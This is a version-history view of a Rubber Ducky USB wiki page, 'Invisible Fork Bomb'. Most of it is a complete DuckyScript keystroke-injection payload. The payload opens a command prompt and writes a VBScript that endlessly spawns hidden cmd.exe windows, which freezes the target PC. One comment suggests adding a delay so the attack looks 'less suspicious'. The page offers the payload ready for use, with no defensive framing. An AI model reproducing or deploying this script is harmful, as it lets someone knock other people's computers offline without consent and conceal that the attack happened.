wiki-rubber-ducky-usb/Invisible-Fork-Bomb.md

33 lines
881 B
Markdown
Raw Normal View History

2017-04-20 16:42:28 +02:00
# Invisible Fork Bomb
2017-04-20 16:51:49 +02:00
The script creates and starts a vbs that executes exponentially cmd.exe without visible windows (Fork bomb -> Freezes the PC).
2017-04-20 16:42:28 +02:00
# About...
Author: [BlueArduino20](https://github.com/BlueArduino20/)
2017-04-21 18:52:08 +02:00
Version 2.0
2017-04-20 16:42:28 +02:00
Repository: [https://github.com/BlueArduino20/Invisible_fork_bomb](https://github.com/BlueArduino20/Invisible_fork_bomb)
# Code
<pre><code>
2017-04-21 18:52:08 +02:00
DELAY 1000
REM ^ You should set more delay time if your computer is slow or if the script doesn't work correctly.
2017-04-20 16:42:28 +02:00
GUI r
DELAY 500
STRING cmd
ENTER
DELAY 500
STRING copy con forkb.vbs
ENTER
STRING do
ENTER
STRING CreateObject("Wscript.Shell").Run "cmd", 0, False
ENTER
STRING loop
CTRL z
ENTER
DELAY 50
2017-04-21 18:52:08 +02:00
STRING start forkb.vbs && exit
REM You can add this: ">null ping localhost -n 5 && " before "start" to make a (5 sec) delay before the vbs execution. (By this way it's less suspicious)
2017-04-20 16:42:28 +02:00
ENTER
</pre></code>